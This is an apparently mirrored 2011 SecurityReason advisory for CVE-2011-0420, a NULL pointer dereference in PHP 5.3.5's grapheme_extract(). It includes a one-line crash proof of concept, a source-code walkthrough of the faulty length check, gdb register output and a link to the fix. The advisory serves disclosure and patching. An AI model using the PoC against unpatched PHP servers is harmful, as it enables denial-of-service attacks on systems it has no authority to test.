扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 |
Source: http://securityreason.com/securityalert/8087 -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 [ PHP 5.3.5 grapheme_extract() NULL Pointer Dereference ] Author: Maksymilian Arciemowicz http://securityreason.com/ http://cxib.net/ Date: - - Dis.: 09.12.2010 - - Pub.: 17.02.2011 CVE: CVE-2011-0420 CERT: VU#210829 Affected Software: - - PHP 5.3.5 Fixed: SVN Original URL: http://securityreason.com/achievement_securityalert/94 - --- 0.Description --- Internationalization extension (further is referred as Intl) is a wrapper for ICU library, enabling PHP programmers to perform UCA-conformant collation and date/time/number/currency formatting in their scripts. grapheme_extract — Function to extract a sequence of default grapheme clusters from a text buffer, which must be encoded in UTF-8. - --- 1. PoC for grapheme_extract() --- grapheme_extract('a',-1); Change length of first parameter to change rip. - --- 2. grapheme_extract() NULL Pointer Dereference --- As we can see in grapheme_extract(str,size) - -grapheme_extract()-- ... if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "sl|llz", (char **)&str, &str_len, &size, &extract_type, &lstart, &next) == FAILURE) { <=== str='a' and size='-1' ... /* if the string is all ASCII up to size+1 - or str_len whichever is first - then we are done. (size + 1 because the size-th character might be the beginning of a grapheme cluster) */ if ( -1 != grapheme_ascii_check(pstr, size + 1 < str_len ? size + 1 : str_len ) ) { <=== ( size=-1+1=0 ) === long nsize = ( size < str_len ? size : str_len ); <=== nsize = -1 if ( NULL != next ) { ZVAL_LONG(next, start+nsize); } RETURN_STRINGL(((char *)pstr), nsize, 1); <=== CRASH POINT } ... - -grapheme_extract()-- if we call to grapheme_ascii_check(pstr,0) where - -grapheme_ascii_check()-- /* {{{ grapheme_ascii_check: ASCII check */ int grapheme_ascii_check(const unsigned char *day, int32_t len) <==== len=0 { int ret_len = len; while ( len-- ) { if ( *day++ > 0x7f ) return -1; } return ret_len; <=== return 0 } - -grapheme_ascii_check()-- then we get (int)0 in result and long nsize = ( size < str_len ? size : str_len ); will be -1. Therefore, RETURN_STRINGL(((char *)pstr), nsize, 1); give NULL pointer dereference here. Changing length of first parameter of grapheme_extract(), we will also change rip in memcpy(3). (gdb) r -r 'grapheme_extract('a',-1);' ... (gdb) x/i $rip => 0x7ffff5511d99 <memcpy+777>: mov %rax,(%rdi) (gdb) x/x $rax 0xf9891857a6e70f70: Cannot access memory at address 0xf9891857a6e70f70 (gdb) x/x $rdi 0x11b2000: Cannot access memory at address 0x11b2000 (gdb) r -r 'grapheme_extract('aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' ,-1);' ... (gdb) x/i $rip => 0x7ffff5511d77 <memcpy+743>: mov 0x18(%rsi),%r10 (gdb) x/x $rsi 0x11b1fe8: 0x00000000 - --- 3. Fix --- CVS http://svn.php.net/viewvc?view=revision&revision=306449 - --- 4. Greets --- Pierre, Stas, sp3x, infospec - --- 5. Contact --- Author: Maksymilian Arciemowicz [ SecurityReason.com ] Email: - - cxib {a\./t]securityreason[d=t} com GPG: - - http://securityreason.com/key/Arciemowicz.Maksymilian.gpg http://securityreason.com/ http://cxib.net/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.10 (GNU/Linux) iQIcBAEBAgAGBQJNXFUmAAoJEIO8+dzW5bUwCvgP/RJCNbPYGy0L366IAyjS4JTf SJ3yt0Vur/v0lPW25+avn1cM/h9eV4o1I41GUvtHB4B4QZKTMx1IXzltCKLVixF8 9Go6ACO8XgtYGpMHRE6ODzHTRLvpdKlIITeviEuCCgRaDOfY2Aov1Kv3V2r24csu mwi6zz0zRwx+34rSNy9AYj7bhHY3OwdFoJ43RIMVNEhastSmfIR9D0a60OAKVBsA 138tDvkNVsJGUFx06sig2uMuZ6F948pr8L7Y7R+HIoMTAg+udkGdfBa4FLkVJIE8 g5kFjJzTE43k3X+Dh7GEf6xEEkNCME3XoSLEDmD/G/+TC6GgmGBokhXExqc0aIJo c7ufy4khYkYKuLhQBnSeGknq9l8X1l9PIJSYr0qeY/Dga4NIDhccJuTnmE0xAYGY bmizSRGKKz9e05JDGcKy51mS2zP/fU6NsjgkuIezkBsuQL/6U2k9FYWfymgi+zwy isRqtmE67pF7xmUybE4nTd4FOZbo7Kkx4g32C7xGyPdnCufnahD+9NXaaDv2HhTk vE5d2EZr1jJyszkY/x2ZUdnMNLp4Ahwj/RpnLlV+//97cuDmjqTLd8Yhu2q2D7k/ wsgrej0XFPGTIEfXNxWIgaD2g/9C9MPPFOt8M9xu+v7jJC0be72QPxnThbSdEyAh 0m12NQTJ+ko52o1g25Z/ =PBFA -----END PGP SIGNATURE----- |
体验盒子
